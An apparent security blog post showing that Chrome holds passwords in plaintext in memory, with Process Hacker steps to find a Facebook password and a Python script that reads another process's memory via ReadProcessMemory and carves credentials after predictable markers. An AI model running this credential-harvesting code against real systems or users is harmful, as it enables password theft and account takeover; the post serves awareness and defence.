Chrome: LOLBin For Attackers

Introduction

Hello, respected readers. I love Chrome for its rich feature set. But web browsers like Chrome hold our passwords in memory as plaintext. Google has declined to fix this because, in their view, an attacker can only exploit it after already compromising your system: a local attacker running code as your user is outside Chrome's threat model. Let's discuss it.


Comparing To File

Chrome encrypts user passwords when it stores them on disk. On Windows, the Login Data SQLite database in the profile directory holds the saved passwords in encrypted form. To decrypt them, an attacker first needs the AES key from the Local State file, which is itself DPAPI-wrapped and must be unwrapped with the win32crypt.CryptUnprotectData function; that call only succeeds for the same Windows user (or with that user's DPAPI master key), which is why the file format resists offline theft but not code already running as the user. Passwords in memory, on the other hand, are all plaintext.


Get Facebook Password

Let's see how the Process Hacker tool can be used to view a user's Facebook password. Suppose the user is logged in to Facebook (or has the Facebook password saved in Chrome). Open Process Hacker and double-click a Chrome process. Chrome runs several processes, so you may need to check more than one; the renderer hosting the Facebook tab and the main browser process are the likely candidates. A new window opens:


Now click the Strings... button, enter the minimum string length and hit OK. A new window like the one below opens:


Now click the Filter button, then Contains..., enter the user's Facebook password and press OK.


You'll now see the user's Facebook password. In my case, the password appeared at multiple memory addresses. Just imagine: anyone can view this.


How Attackers Steal

Above, I showed how plaintext passwords can be found with Process Hacker. But attackers don't already know your password, so how can they search for it? They first dump the Chrome process memory, or read it from another process (e.g. with the ReadProcessMemory function). Suppose an attacker has dumped Chrome's memory into a .dmp file. In my research, when I opened the .dmp file in a hex editor, I found that passwords or emails are usually located:

- After the textBox_write string.

- After the website URL.


These structures change often between browser versions, though, so the markers are a starting point rather than a fixed offset. More details can be found here.
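The manual Process Hacker workflow (Strings..., then Filter > Contains...) and the dump-carving described in this section, as one added example that is not code from the original post. DUMP is a constructed byte buffer imitating a fragment of a Chrome .dmp with made-up credentials; the markers it searches for (a site URL and textBox_write) are the ones the post reports. The last function is the "read it from another process" path with ReadProcessMemory and runs only on Windows; the carving and filtering run anywhere.

```python
"""Carve printable strings out of Chrome memory and filter them: the programmatic
equivalent of Process Hacker's Strings... / Filter > Contains... dialogs.

Added example, not code from the original post. DUMP is a constructed byte
buffer imitating a fragment of a Chrome .dmp (made-up credentials); the marker
names (a site URL, textBox_write) are the ones the post reports seeing.
"""
import ctypes
import re
import sys
from typing import List, Tuple

Carved = List[Tuple[int, str]]


def carve_strings(data: bytes, min_len: int = 5) -> Carved:
    """Return (offset, text) for every run of at least min_len printable chars,
    both single-byte ASCII and UTF-16LE (Chrome keeps both kinds around)."""
    found: Carved = []
    for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data):
        found.append((m.start(), m.group().decode("ascii")))
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data):
        found.append((m.start(), m.group().decode("utf-16-le")))
    return sorted(found)


def filter_contains(strings: Carved, needle: str) -> Carved:
    """Filter > Contains...: only useful when you already know the secret."""
    return [(off, s) for off, s in strings if needle in s]


def strings_after_marker(strings: Carved, marker: str, count: int = 3):
    """What an attacker who does not know the password does: take the strings
    that immediately follow a known marker (site URL, textBox_write) in memory."""
    hits = []
    for i, (off, s) in enumerate(strings):
        if marker in s:
            hits.append((off, [t for _, t in strings[i + 1:i + 1 + count]]))
    return hits


def read_process_strings(pid: int, min_len: int = 5) -> Carved:
    """Windows only: the 'read it from another process' path. Walk committed,
    readable regions with VirtualQueryEx, copy each with ReadProcessMemory and
    carve it. Needs PROCESS_VM_READ on the target, i.e. same user or admin."""
    if sys.platform != "win32":
        raise OSError("ReadProcessMemory is a Windows API")

    class MBI(ctypes.Structure):  # MEMORY_BASIC_INFORMATION
        _fields_ = [("BaseAddress", ctypes.c_void_p), ("AllocationBase", ctypes.c_void_p),
                    ("AllocationProtect", ctypes.c_uint32), ("RegionSize", ctypes.c_size_t),
                    ("State", ctypes.c_uint32), ("Protect", ctypes.c_uint32), ("Type", ctypes.c_uint32)]

    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.POINTER(MBI), ctypes.c_size_t]
    k32.ReadProcessMemory.restype = ctypes.c_int
    k32.ReadProcessMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p,
                                      ctypes.c_size_t, ctypes.POINTER(ctypes.c_size_t)]
    PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010
    MEM_COMMIT, PAGE_NOACCESS, PAGE_GUARD = 0x1000, 0x01, 0x100

    h = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    out: Carved = []
    addr, mbi = 0, MBI()
    try:
        while k32.VirtualQueryEx(h, addr, ctypes.byref(mbi), ctypes.sizeof(mbi)):
            base = mbi.BaseAddress or 0
            if mbi.State == MEM_COMMIT and not mbi.Protect & (PAGE_NOACCESS | PAGE_GUARD):
                buf = ctypes.create_string_buffer(mbi.RegionSize)
                got = ctypes.c_size_t(0)
                if k32.ReadProcessMemory(h, base, buf, mbi.RegionSize, ctypes.byref(got)):
                    out.extend((base + off, s) for off, s in carve_strings(buf.raw[: got.value], min_len))
            addr = base + mbi.RegionSize
    finally:
        k32.CloseHandle(h)
    return out


# Constructed fragment of a memory dump: junk, a login URL, credentials in UTF-8,
# then the textBox_write marker and the password again as UTF-16LE.
DUMP = (
    b"\x00" * 16 + b"\x7fELF\x00\x00"
    + b"https://www.facebook.com/login/\x00\x00"
    + b"email=alice@example.com\x00"
    + b"pass=Hunter2-Example!\x00\x01\x02\x03"
    + "textBox_write".encode("utf-16-le") + b"\x00\x00"
    + "Hunter2-Example!".encode("utf-16-le") + b"\x00\x00"
    + b"\x90" * 8
)
```

Run `strings_after_marker(carve_strings(DUMP), "facebook.com")` to see the attacker's view: they never needed the password as a filter, only a marker they could predict. Against a real process, `read_process_strings(pid)` yields the same (address, text) pairs, and the same marker search applies; note it needs no elevation when the target runs as the same user, which is the point the post is making.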


Summary

The issue described here is not new; a security professional wrote about it in a blog post back in 2015. Using this method, an attacker can steal not only passwords but also your search history, recently visited pages and so on. Imagine: an attacker can take over all your online accounts just by having local access, even after you have closed the browser tab!


Md. Abdullah Al Mamun

Cyber Defence Engineer, CyDefOps